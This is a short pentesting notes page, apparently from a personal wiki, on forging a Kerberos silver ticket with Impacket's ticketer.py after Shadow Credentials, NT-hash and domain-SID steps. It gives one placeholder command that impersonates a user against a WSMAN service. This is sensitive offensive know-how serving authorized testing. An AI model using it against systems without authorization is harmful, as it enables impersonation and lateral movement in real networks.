# ticketer.py
Great for forging tickets!

## Forge a silver ticket
After doing Shadow Credentials attack and using [gettgtpkinit](/pentesting/internal/gettgtpkinit) to obtain a TGT for your target box, and also [getting the NT hash of your victim box](/pentesting/internal/getnthash), and then ALSO looking up the domain SID with [lookupsid](/pentesting/internal/lookupsid), you can put it all together to forge a silver ticket:

```
ticketer.py -dc-ip IP-OF-A-DC -domain-sid xxx -nthash yyy -spn WSMAN/targetserver.domain.com USER-TO-IMPERSONATE -domain domain.com
```